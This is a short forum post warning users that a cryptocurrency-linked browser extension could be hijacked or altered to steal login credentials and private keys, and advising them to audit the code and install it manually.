Today, I have seen this comment from a bot welcoming new users:
I am a big fan of the extension, used it for a while in the past. Not saying something bad here but downloading it from the official Chrome store, or downloading it before auditing the code?
Hell no. It's a big no.
Why?
Owner account on google may be hacked and a new -harmful- version of the extension can be published on the chrome extension store.
Owner (even though I trust the current developer %100 and don't suspect anything) can change the codes himself and can do harmful stuff with the users' accounts.
What's considered harmful?
- Extension may listen the login inputs and post your credentials a private server
- Extension may send the "unhidden" private keys if you unhid them in the wallet page.
- Extension may upvote anything without your knowledge.
Bad possibilities are endless. If something has a possibility to go wrong, It will go wrong at some point. If you really want to use the app:
- Install it manually. And audit the code beforehand. If you don't have skills to audit the code yourself, my humble advice is that you shouldn't use the extension.
There's real money involved with your accounts. Do not leave your keys in a vulnerable place.